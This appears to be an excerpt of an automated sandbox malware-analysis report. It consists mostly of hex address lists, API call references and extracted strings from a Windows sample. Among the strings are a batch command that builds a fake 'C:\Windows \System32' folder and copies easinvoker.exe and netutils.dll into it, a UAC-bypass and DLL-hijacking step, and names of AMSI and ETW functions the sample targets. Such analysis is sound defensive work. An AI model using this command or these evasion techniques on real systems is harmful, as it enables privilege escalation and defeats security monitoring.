                                                                                                0x0218cb2f
                                                                                                0x0218cb3a
                                                                                                0x0218cb3b
                                                                                                0x0218cb40
                                                                                                0x0218cb52
                                                                                                0x0218cb5d
                                                                                                0x0218cb62
                                                                                                0x0218cb64
                                                                                                0x0218cb6a
                                                                                                0x0218cb6f
                                                                                                0x0218cb75
                                                                                                0x0218cb85
                                                                                                0x0218cb9d
                                                                                                0x0218cba8
                                                                                                0x0218cbaf
                                                                                                0x0218cbba
                                                                                                0x0218cbd2
                                                                                                0x0218cbdd
                                                                                                0x0218cbde
                                                                                                0x0218cbe3
                                                                                                0x0218cbe8
                                                                                                0x0218cbf5
                                                                                                0x0218cc07
                                                                                                0x0218cc0c
                                                                                                0x0218cc11
                                                                                                0x0218cc17
                                                                                                0x0218cc27
                                                                                                0x0218cc3f
                                                                                                0x0218cc4a
                                                                                                0x0218cc51
                                                                                                0x0218cc5c
                                                                                                0x0218cc74
                                                                                                0x0218cc7f
                                                                                                0x0218cc80
                                                                                                0x0218cc8a
                                                                                                0x0218cc8f
                                                                                                0x0218cca1
                                                                                                0x0218ccac
                                                                                                0x0218ccbe
                                                                                                0x0218ccc6
                                                                                                0x0218ccc9
                                                                                                0x0218ccdb
                                                                                                0x0218cce6
                                                                                                0x0218ccf8
                                                                                                0x0218cd00
                                                                                                0x0218cd03
                                                                                                0x0218cd15
                                                                                                0x0218cd20
                                                                                                0x0218cd32
                                                                                                0x0218cd3a
                                                                                                0x0218cd3d
                                                                                                0x0218cd4f
                                                                                                0x0218cd5a
                                                                                                0x0218cd6c
                                                                                                0x0218cd74
                                                                                                0x0218cd77
                                                                                                0x0218cd89
                                                                                                0x0218cd94
                                                                                                0x0218cda6
                                                                                                0x0218cdae
                                                                                                0x0218cdb1
                                                                                                0x0218cdc3
                                                                                                0x0218cdc8
                                                                                                0x0218cdce
                                                                                                0x0218cde0
                                                                                                0x0218cde8
                                                                                                0x0218cdea
                                                                                                0x0218cdea
                                                                                                0x0218cdeb
                                                                                                0x0218cdf0
                                                                                                0x0218cdf6
                                                                                                0x0218ce06
                                                                                                0x0218ce1e
                                                                                                0x0218ce29
                                                                                                0x0218ce30
                                                                                                0x0218ce3b
                                                                                                0x0218ce53
                                                                                                0x0218ce5e
                                                                                                0x0218ce5f
                                                                                                0x0218ce64
                                                                                                0x0218ce69
                                                                                                0x0218ce6f
                                                                                                0x0218ce7f
                                                                                                0x0218ce97
                                                                                                0x0218cea2
                                                                                                0x0218cea9
                                                                                                0x0218ceb4
                                                                                                0x0218cecc
                                                                                                0x0218ced7
                                                                                                0x0218ced8
                                                                                                0x0218cedd
                                                                                                0x0218cee7
                                                                                                0x0218ceec
                                                                                                0x0218cef2
                                                                                                0x0218cefc
                                                                                                0x0218cf01
                                                                                                0x0218cf07
                                                                                                0x0218cf11
                                                                                                0x0218cf16
                                                                                                0x0218cf1c
                                                                                                0x0218cf21
                                                                                                0x0218cf27
                                                                                                0x0218cf37
                                                                                                0x0218cf4f
                                                                                                0x0218cf5a
                                                                                                0x0218cf61
                                                                                                0x0218cf6c
                                                                                                0x0218cf84
                                                                                                0x0218cf8f
                                                                                                0x0218cf90
                                                                                                0x0218cf95
                                                                                                0x0218cf9a
                                                                                                0x0218cfa0
                                                                                                0x0218cfb0
                                                                                                0x0218cfc8
                                                                                                0x0218cfd3
                                                                                                0x0218cfda
                                                                                                0x0218cfe5
                                                                                                0x0218cffd
                                                                                                0x0218d008
                                                                                                0x0218d009
                                                                                                0x0218d016
                                                                                                0x0218d021
                                                                                                0x0218d032
                                                                                                0x0218d03c
                                                                                                0x0218d041
                                                                                                0x0218d046
                                                                                                0x0218d04c
                                                                                                0x0218d05c
                                                                                                0x0218d074
                                                                                                0x0218d07f
                                                                                                0x0218d086
                                                                                                0x0218d091
                                                                                                0x0218d0a9
                                                                                                0x0218d0b4
                                                                                                0x0218d0b5
                                                                                                0x0218d0ba
                                                                                                0x0218d0bf
                                                                                                0x0218d0c5
                                                                                                0x0218d0d5
                                                                                                0x0218d0ed
                                                                                                0x0218d0f8
                                                                                                0x0218d0ff
                                                                                                0x0218d10a
                                                                                                0x0218d122
                                                                                                0x0218d12d
                                                                                                0x0218d12e
                                                                                                0x0218d133
                                                                                                0x0218d145
                                                                                                0x0218d155
                                                                                                0x0218d15a
                                                                                                0x0218d15f
                                                                                                0x0218d165
                                                                                                0x0218d175
                                                                                                0x0218d18d
                                                                                                0x0218d198
                                                                                                0x0218d19f
                                                                                                0x0218d1aa
                                                                                                0x0218d1c2
                                                                                                0x0218d1cd
                                                                                                0x0218d1ce
                                                                                                0x0218d1d3
                                                                                                0x0218d1d8
                                                                                                0x0218d1de
                                                                                                0x0218d1ee
                                                                                                0x0218d206
                                                                                                0x0218d211
                                                                                                0x0218d218
                                                                                                0x0218d223
                                                                                                0x0218d23b
                                                                                                0x0218d246
                                                                                                0x0218d247
                                                                                                0x0218d24c
                                                                                                0x0218d25e
                                                                                                0x0218d263
                                                                                                0x0218d268
                                                                                                0x0218d26e
                                                                                                0x0218d27e
                                                                                                0x0218d296
                                                                                                0x0218d2a1
                                                                                                0x0218d2a8
                                                                                                0x0218d2b3
                                                                                                0x0218d2cb
                                                                                                0x0218d2d6
                                                                                                0x0218d2d7
                                                                                                0x0218d2dc
                                                                                                0x0218d2e1
                                                                                                0x0218d2e7
                                                                                                0x0218d2f7
                                                                                                0x0218d30f
                                                                                                0x0218d31a
                                                                                                0x0218d321
                                                                                                0x0218d32c
                                                                                                0x0218d344
                                                                                                0x0218d34f
                                                                                                0x0218d350
                                                                                                0x0218d355
                                                                                                0x0218d35b
                                                                                                0x0218d360
                                                                                                0x0218d365
                                                                                                0x0218d36b
                                                                                                0x0218d37b
                                                                                                0x0218d393
                                                                                                0x0218d39e
                                                                                                0x0218d3a5
                                                                                                0x0218d3b0
                                                                                                0x0218d3c8
                                                                                                0x0218d3d3
                                                                                                0x0218d3d4
                                                                                                0x0218d3d9
                                                                                                0x0218d3de
                                                                                                0x0218d3e4
                                                                                                0x0218d3f4
                                                                                                0x0218d40c
                                                                                                0x0218d417
                                                                                                0x0218d41e
                                                                                                0x0218d429
                                                                                                0x0218d441
                                                                                                0x0218d44c
                                                                                                0x0218d44d
                                                                                                0x0218d452
                                                                                                0x0218d457
                                                                                                0x0218d45d
                                                                                                0x0218d46d
                                                                                                0x0218d485
                                                                                                0x0218d490
                                                                                                0x0218d497
                                                                                                0x0218d4a2
                                                                                                0x0218d4ba
                                                                                                0x0218d4c5
                                                                                                0x0218d4c6
                                                                                                0x0218d4d0
                                                                                                0x0218d4d5
                                                                                                0x0218d4d6
                                                                                                0x0218d4db
                                                                                                0x0218d4dd
                                                                                                0x0218d4f0
                                                                                                0x0218d4f5
                                                                                                0x0218d4fb
                                                                                                0x0218d50b
                                                                                                0x0218d523
                                                                                                0x0218d52e
                                                                                                0x0218d535
                                                                                                0x0218d540
                                                                                                0x0218d558
                                                                                                0x0218d563
                                                                                                0x0218d564
                                                                                                0x0218d4df
                                                                                                0x0218d4e9
                                                                                                0x0218d4e9
                                                                                                0x0218d569
                                                                                                0x0218d56e
                                                                                                0x0218d574
                                                                                                0x0218d584
                                                                                                0x0218d59c
                                                                                                0x0218d5a7
                                                                                                0x0218d5ae
                                                                                                0x0218d5b9
                                                                                                0x0218d5d1
                                                                                                0x0218d5dc
                                                                                                0x0218d5dd
                                                                                                0x0218d5e7
                                                                                                0x0218d5f3
                                                                                                0x0218d5f8
                                                                                                0x0218d5fd
                                                                                                0x0218d602
                                                                                                0x0218d608
                                                                                                0x0218d618
                                                                                                0x0218d630
                                                                                                0x0218d63b
                                                                                                0x0218d642
                                                                                                0x0218d64d
                                                                                                0x0218d665
                                                                                                0x0218d670
                                                                                                0x0218d671
                                                                                                0x0218d676
                                                                                                0x0218d67b
                                                                                                0x0218d67c
                                                                                                0x0218d681
                                                                                                0x0218d686
                                                                                                0x0218d68c
                                                                                                0x0218d69c
                                                                                                0x0218d6b4
                                                                                                0x0218d6bf
                                                                                                0x0218d6c6
                                                                                                0x0218d6d1
                                                                                                0x0218d6e9
                                                                                                0x0218d6f4
                                                                                                0x0218d6f5
                                                                                                0x0218d6f5
                                                                                                0x0218cf16
                                                                                                0x0218cf01
                                                                                                0x0218d6fa
                                                                                                0x0218d6ff
                                                                                                0x0218d705
                                                                                                0x0218d715
                                                                                                0x0218d72d
                                                                                                0x0218d738
                                                                                                0x0218d73f
                                                                                                0x0218d74a
                                                                                                0x0218d762
                                                                                                0x0218d76d
                                                                                                0x0218d76e
                                                                                                0x0218d773
                                                                                                0x0218d778
                                                                                                0x0218d77e
                                                                                                0x0218d78e
                                                                                                0x0218d7a6
                                                                                                0x0218d7b1
                                                                                                0x0218d7b8
                                                                                                0x0218d7c3
                                                                                                0x0218d7db
                                                                                                0x0218d7e6
                                                                                                0x0218d7e7
                                                                                                0x0218d7ec
                                                                                                0x0218d7f6
                                                                                                0x0218d7fb
                                                                                                0x0218d801
                                                                                                0x0218d80b
                                                                                                0x0218d810
                                                                                                0x0218d816
                                                                                                0x0218d820
                                                                                                0x0218d825
                                                                                                0x0218d830
                                                                                                0x0218d835
                                                                                                0x0218d836
                                                                                                0x0218d83d
                                                                                                0x0218d850
                                                                                                0x0218d855
                                                                                                0x0218d85b
                                                                                                0x0218d86b
                                                                                                0x0218d883
                                                                                                0x0218d88e
                                                                                                0x0218d895
                                                                                                0x0218d8a0
                                                                                                0x0218d8b8
                                                                                                0x0218d8c3
                                                                                                0x0218d8c4
                                                                                                0x0218d83f
                                                                                                0x0218d849
                                                                                                0x0218d849
                                                                                                0x0218d8d1
                                                                                                0x0218d8dc
                                                                                                0x0218d8e2
                                                                                                0x0218d8e9
                                                                                                0x0218d8ea
                                                                                                0x0218d8ea
                                                                                                0x0218d825
                                                                                                0x0218d810
                                                                                                0x0218d8ef
                                                                                                0x0218d8f4
                                                                                                0x0218d8fa
                                                                                                0x0218d90a
                                                                                                0x0218d922
                                                                                                0x0218d92d
                                                                                                0x0218d934
                                                                                                0x0218d93f
                                                                                                0x0218d957
                                                                                                0x0218d962
                                                                                                0x0218d963
                                                                                                0x0218d968
                                                                                                0x0218d96d
                                                                                                0x0218d973
                                                                                                0x0218d983
                                                                                                0x0218d99b
                                                                                                0x0218d9a6
                                                                                                0x0218d9ad
                                                                                                0x0218d9b8
                                                                                                0x0218d9d0
                                                                                                0x0218d9db
                                                                                                0x0218d9dc
                                                                                                0x0218d9e1
                                                                                                0x0218d9eb
                                                                                                0x0218d9f0
                                                                                                0x0218d9f6
                                                                                                0x0218da00
                                                                                                0x0218da05
                                                                                                0x0218da0b
                                                                                                0x0218da15
                                                                                                0x0218da1a
                                                                                                0x0218da25
                                                                                                0x0218da2a
                                                                                                0x0218da2b
                                                                                                0x0218da32
                                                                                                0x0218da45
                                                                                                0x0218da4a
                                                                                                0x0218da50
                                                                                                0x0218da60
                                                                                                0x0218da78
                                                                                                0x0218da83
                                                                                                0x0218da8a
                                                                                                0x0218da95
                                                                                                0x0218daad
                                                                                                0x0218dab8
                                                                                                0x0218dab9
                                                                                                0x0218da34
                                                                                                0x0218da3e
                                                                                                0x0218da3e
                                                                                                0x0218dac8
                                                                                                0x0218dac8
                                                                                                0x0218da1a
                                                                                                0x0218da05
                                                                                                0x0218dacd
                                                                                                0x0218dad2
                                                                                                0x0218dad8
                                                                                                0x0218dae8
                                                                                                0x0218db00
                                                                                                0x0218db0b
                                                                                                0x0218db12
                                                                                                0x0218db1d
                                                                                                0x0218db35
                                                                                                0x0218db40
                                                                                                0x0218db41
                                                                                                0x0218db46
                                                                                                0x0218db4b
                                                                                                0x0218db51
                                                                                                0x0218db61
                                                                                                0x0218db79
                                                                                                0x0218db84
                                                                                                0x0218db8b
                                                                                                0x0218db96
                                                                                                0x0218dbae
                                                                                                0x0218dbb9
                                                                                                0x0218dbba
                                                                                                0x0218dbbf
                                                                                                0x0218dbc4
                                                                                                0x0218dbca
                                                                                                0x0218dbda
                                                                                                0x0218dbf2
                                                                                                0x0218dbfd
                                                                                                0x0218dc04
                                                                                                0x0218dc0f
                                                                                                0x0218dc27
                                                                                                0x0218dc32
                                                                                                0x0218dc33
                                                                                                0x0218dc43
                                                                                                0x0218dc4e
                                                                                                0x0218dc5a
                                                                                                0x0218dc65
                                                                                                0x0218dc66
                                                                                                0x0218dc76
                                                                                                0x0218dc81
                                                                                                0x0218dc8d
                                                                                                0x0218dc98
                                                                                                0x0218dc99
                                                                                                0x0218dc9e
                                                                                                0x0218dca3
                                                                                                0x0218dca9
                                                                                                0x0218dcb9
                                                                                                0x0218dcd1
                                                                                                0x0218dcdc
                                                                                                0x0218dce3
                                                                                                0x0218dcee
                                                                                                0x0218dd06
                                                                                                0x0218dd11
                                                                                                0x0218dd12
                                                                                                0x0218dd22
                                                                                                0x0218dd2d
                                                                                                0x0218dd39
                                                                                                0x0218dd44
                                                                                                0x0218dd45
                                                                                                0x0218dd55
                                                                                                0x0218dd60
                                                                                                0x0218dd6c
                                                                                                0x0218dd77
                                                                                                0x0218dd78
                                                                                                0x0218dd7d
                                                                                                0x0218dd82
                                                                                                0x0218dd88
                                                                                                0x0218dd98
                                                                                                0x0218ddb0
                                                                                                0x0218ddbb
                                                                                                0x0218ddc2
                                                                                                0x0218ddcd
                                                                                                0x0218dde5
                                                                                                0x0218ddf0
                                                                                                0x0218ddf1
                                                                                                0x0218ddf6
                                                                                                0x0218ddfb
                                                                                                0x0218de01
                                                                                                0x0218de11
                                                                                                0x0218de29
                                                                                                0x0218de34
                                                                                                0x0218de3b
                                                                                                0x0218de46
                                                                                                0x0218de5e
                                                                                                0x0218de69
                                                                                                0x0218de6a
                                                                                                0x0218de6f
                                                                                                0x0218de74
                                                                                                0x0218de7a
                                                                                                0x0218de8a
                                                                                                0x0218dea2
                                                                                                0x0218dead
                                                                                                0x0218deb4
                                                                                                0x0218debf
                                                                                                0x0218ded7
                                                                                                0x0218dee2
                                                                                                0x0218dee3
                                                                                                0x0218dee8
                                                                                                0x0218deed
                                                                                                0x0218def3
                                                                                                0x0218df03
                                                                                                0x0218df1b
                                                                                                0x0218df26
                                                                                                0x0218df2d
                                                                                                0x0218df38
                                                                                                0x0218df50
                                                                                                0x0218df5b
                                                                                                0x0218df5c
                                                                                                0x0218df6e
                                                                                                0x0218df8b
                                                                                                0x0218df70
                                                                                                0x0218df7a
                                                                                                0x0218df7a
                                                                                                0x0218df9b
                                                                                                0x0218dfa6
                                                                                                0x0218dfb2
                                                                                                0x0218dfbd
                                                                                                0x0218dfbe
                                                                                                0x0218dfc3
                                                                                                0x0218dfc8
                                                                                                0x0218dfce
                                                                                                0x0218dfde
                                                                                                0x0218dff6
                                                                                                0x0218e001
                                                                                                0x0218e008
                                                                                                0x0218e013
                                                                                                0x0218e02b
                                                                                                0x0218e036
                                                                                                0x0218e037
                                                                                                0x0218e047
                                                                                                0x0218e052
                                                                                                0x0218e05e
                                                                                                0x0218e069
                                                                                                0x0218e06a
                                                                                                0x0218e07a
                                                                                                0x0218e085
                                                                                                0x0218e091
                                                                                                0x0218e09c
                                                                                                0x0218e09d
                                                                                                0x0218e0ad
                                                                                                0x0218e0b8
                                                                                                0x0218e0c4
                                                                                                0x0218e0cf
                                                                                                0x0218e0d0
                                                                                                0x0218e0d5
                                                                                                0x0218e0da
                                                                                                0x0218e0e0
                                                                                                0x0218e0f0
                                                                                                0x0218e108
                                                                                                0x0218e113
                                                                                                0x0218e11a
                                                                                                0x0218e125
                                                                                                0x0218e13d
                                                                                                0x0218e148
                                                                                                0x0218e149
                                                                                                0x0218e159
                                                                                                0x0218e164
                                                                                                0x0218e165
                                                                                                0x0218e177
                                                                                                0x0218e182
                                                                                                0x0218e183
                                                                                                0x0218e193
                                                                                                0x0218e19e
                                                                                                0x0218e19f
                                                                                                0x0218e1b1
                                                                                                0x0218e1bc
                                                                                                0x0218e1bd
                                                                                                0x0218e1cd
                                                                                                0x0218e1d8
                                                                                                0x0218e1d9
                                                                                                0x0218e1eb
                                                                                                0x0218e1f6
                                                                                                0x0218e1f7
                                                                                                0x0218e207
                                                                                                0x0218e212
                                                                                                0x0218e213
                                                                                                0x0218e225
                                                                                                0x0218e230
                                                                                                0x0218e231
                                                                                                0x0218e241
                                                                                                0x0218e24c
                                                                                                0x0218e24d
                                                                                                0x0218e25f
                                                                                                0x0218e26a
                                                                                                0x0218e26b
                                                                                                0x0218e27b
                                                                                                0x0218e286
                                                                                                0x0218e287
                                                                                                0x0218e299
                                                                                                0x0218e2a4
                                                                                                0x0218e2a5
                                                                                                0x0218e2b5
                                                                                                0x0218e2c0
                                                                                                0x0218e2c1
                                                                                                0x0218e2d3
                                                                                                0x0218e2de
                                                                                                0x0218e2df
                                                                                                0x0218e2ef
                                                                                                0x0218e2fa
                                                                                                0x0218e2fb
                                                                                                0x0218e30d
                                                                                                0x0218e318
                                                                                                0x0218e319
                                                                                                0x0218e329
                                                                                                0x0218e334
                                                                                                0x0218e335
                                                                                                0x0218e347
                                                                                                0x0218e352
                                                                                                0x0218e353
                                                                                                0x0218e363
                                                                                                0x0218e36e
                                                                                                0x0218e36f
                                                                                                0x0218e381
                                                                                                0x0218e38c
                                                                                                0x0218e38d
                                                                                                0x0218e39d
                                                                                                0x0218e3a8
                                                                                                0x0218e3a9
                                                                                                0x0218e3bb
                                                                                                0x0218e3c6
                                                                                                0x0218e3c7
                                                                                                0x0218e3d7
                                                                                                0x0218e3e2
                                                                                                0x0218e3e3
                                                                                                0x0218e3f5
                                                                                                0x0218e400
                                                                                                0x0218e401
                                                                                                0x0218e406
                                                                                                0x0218e40b
                                                                                                0x0218e411
                                                                                                0x0218e421
                                                                                                0x0218e439
                                                                                                0x0218e444
                                                                                                0x0218e44b
                                                                                                0x0218e456
                                                                                                0x0218e46e
                                                                                                0x0218e479
                                                                                                0x0218e47a
                                                                                                0x0218e48a
                                                                                                0x0218e495
                                                                                                0x0218e496
                                                                                                0x0218e4a8
                                                                                                0x0218e4b3
                                                                                                0x0218e4b4
                                                                                                0x0218e4c4
                                                                                                0x0218e4cf
                                                                                                0x0218e4d0
                                                                                                0x0218e4e2
                                                                                                0x0218e4ed
                                                                                                0x0218e4ee
                                                                                                0x0218e4fe
                                                                                                0x0218e509
                                                                                                0x0218e50a
                                                                                                0x0218e51c
                                                                                                0x0218e527
                                                                                                0x0218e528
                                                                                                0x0218e538
                                                                                                0x0218e543
                                                                                                0x0218e544
                                                                                                0x0218e556
                                                                                                0x0218e561
                                                                                                0x0218e562
                                                                                                0x0218e572
                                                                                                0x0218e57d
                                                                                                0x0218e57e
                                                                                                0x0218e590
                                                                                                0x0218e59b
                                                                                                0x0218e59c
                                                                                                0x0218e5ac
                                                                                                0x0218e5b7
                                                                                                0x0218e5b8
                                                                                                0x0218e5ca
                                                                                                0x0218e5d5
                                                                                                0x0218e5d6
                                                                                                0x0218e5e6
                                                                                                0x0218e5f1
                                                                                                0x0218e5f2
                                                                                                0x0218e604
                                                                                                0x0218e60f
                                                                                                0x0218e610
                                                                                                0x0218e617
                                                                                                0x0218e61e
                                                                                                0x0218e621
                                                                                                0x0218e624
                                                                                                0x0218e634
                                                                                                0x0218e644
                                                                                                0x0218e654
                                                                                                0x0218e664
                                                                                                0x0218e66f
                                                                                                0x0218e67f
                                                                                                0x0218e68f
                                                                                                0x0218e69f
                                                                                                0x0218e6aa
                                                                                                0x0218e6ba
                                                                                                0x0218e6ca
                                                                                                0x0218e6da
                                                                                                0x0218e6e5
                                                                                                0x0218e6eb
                                                                                                0x0218e6fb
                                                                                                0x0218e706
                                                                                                0x0218e70c
                                                                                                0x0218e71c
                                                                                                0x0218e72c
                                                                                                0x0218e741

                                                                                                APIs
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 021889A4: _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                  • Part of subcall function 021889A4: _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                  • Part of subcall function 021889A4: _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                  • Part of subcall function 021780F8: GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                  • Part of subcall function 02188A30: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B48
                                                                                                  • Part of subcall function 02188A30: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B5F
                                                                                                  • Part of subcall function 02188A30: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B68
                                                                                                  • Part of subcall function 02188A30: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02188B71
                                                                                                • Sleep.KERNEL32(00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat,0218E8D8,ScanString), ref: 0218CC8A
                                                                                                • DeleteFileA.KERNEL32(00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat,0218E8D8), ref: 0218CCBE
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,KDECO.bat), ref: 0218CCF8
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C), ref: 0218CD32
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession), ref: 0218CD6C
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C), ref: 0218CDA6
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer), ref: 0218CDE0
                                                                                                • WinExec.KERNEL32 ref: 0218D032
                                                                                                • Sleep.KERNEL32(000001F4,00000000,00000000,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer,0218E77C,OpenSession), ref: 0218D03C
                                                                                                  • Part of subcall function 021857D0: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02185893
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000DF8,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,000001F4,00000000,00000000,OpenSession,0218E77C), ref: 0218D259
                                                                                                • NtSuspendThread.N(00000850,OpenSession,0218E77C,ScanBuffer,0218E77C,001F0FFF,00000000,00000DF8,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C), ref: 0218D35B
                                                                                                • InetIsOffline.URL(00000000,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000850,OpenSession,0218E77C,ScanBuffer,0218E77C,001F0FFF,00000000,00000DF8,OpenSession), ref: 0218D4D6
                                                                                                • ZwClose.N(00000850,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000000,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,00000850,OpenSession), ref: 0218D67C
                                                                                                • InetIsOffline.URL(00000000,ScanString,0218E77C,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,ScanBuffer), ref: 0218D836
                                                                                                • InetIsOffline.URL(00000000,OpenSession,0218E77C,ScanString,0218E77C,ScanString,0218E77C,OpenSession,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,ScanString,0218E77C,ScanBuffer), ref: 0218DA2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Delete$CloseHandleInetOfflineProcess$LibraryMemorySleep$AddressAttributesCompareCreateCurrentExecFlushFreeLoadModuleMoveObjectOpenProcSingleStringSuspendThreadVirtualWait_lclose_lcreat_lwrite
                                                                                                • String ID: 5E5CDDEE$C:\Windows\System32\$CreateRemoteThreadEx $EtwEventWrite$EtwEventWriteEx$Initialize$KDECO.bat$KernelBase$LdrGetDllHandle$LdrLoadDll$LdrQueryProcessModuleInformation$NtAccessCheck$NtAccessCheckAndAuditAlarm$NtAllocateUuids$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenSection$NtPrivilegeCheck$NtPrivilegeObjectAuditAlarm$NtPrivilegedServiceAuditAlarm$NtQuerySecurityObject$NtSetSecurityObject$O.bat$OpenSession$ReportEventA$ReportEventW$ScanBuffer$ScanString$SetEncryptedFileMetadata$UacInitialize$UacScan$VirtualAlloc$VirtualProtect$advapi32$easinvoker.exe$kernel32$kernelbase$mkdir "\\?\C:\Windows " mkdir "\\?\C:\Windows \System32"ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YECHO F|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y"C:\Wi$netutils.dll
                                                                                                • API String ID: 337110212-3532920570
                                                                                                • Opcode ID: cdca9848481a8ecbae7335fbec07eda1c7de337dccb3a363f10516e34bac649c
                                                                                                • Instruction ID: 9ef62a21aff2f752fa3945ec9bb83c185c2f20987d7555e1c268f1d8f877231d
                                                                                                • Opcode Fuzzy Hash: cdca9848481a8ecbae7335fbec07eda1c7de337dccb3a363f10516e34bac649c
                                                                                                • Instruction Fuzzy Hash: D503DF79AC02599FDB30FB64DD80ADE73F6ABC9700F1084E6A549A7200DF319E918F95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02175D0C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3328 2175d0c-2175d4d GetModuleFileNameA RegOpenKeyExA 3329 2175d8f-2175dd2 call 2175b48 RegQueryValueExA 3328->3329 3330 2175d4f-2175d6b RegOpenKeyExA 3328->3330 3335 2175df6-2175e10 RegCloseKey 3329->3335 3336 2175dd4-2175df0 RegQueryValueExA 3329->3336 3330->3329 3332 2175d6d-2175d89 RegOpenKeyExA 3330->3332 3332->3329 3334 2175e18-2175e49 lstrcpynA GetThreadLocale GetLocaleInfoA 3332->3334 3337 2175f32-2175f39 3334->3337 3338 2175e4f-2175e53 3334->3338 3336->3335 3339 2175df2 3336->3339 3341 2175e55-2175e59 3338->3341 3342 2175e5f-2175e75 lstrlenA 3338->3342 3339->3335 3341->3337 3341->3342 3343 2175e78-2175e7b 3342->3343 3344 2175e87-2175e8f 3343->3344 3345 2175e7d-2175e85 3343->3345 3344->3337 3347 2175e95-2175e9a 3344->3347 3345->3344 3346 2175e77 3345->3346 3346->3343 3348 2175ec4-2175ec6 3347->3348 3349 2175e9c-2175ec2 lstrcpynA LoadLibraryExA 3347->3349 3348->3337 3350 2175ec8-2175ecc 3348->3350 3349->3348 3350->3337 3351 2175ece-2175efe lstrcpynA LoadLibraryExA 3350->3351 3351->3337 3352 2175f00-2175f30 lstrcpynA LoadLibraryExA 3351->3352 3352->3337
                                                                                                C-Code - Quality: 86%
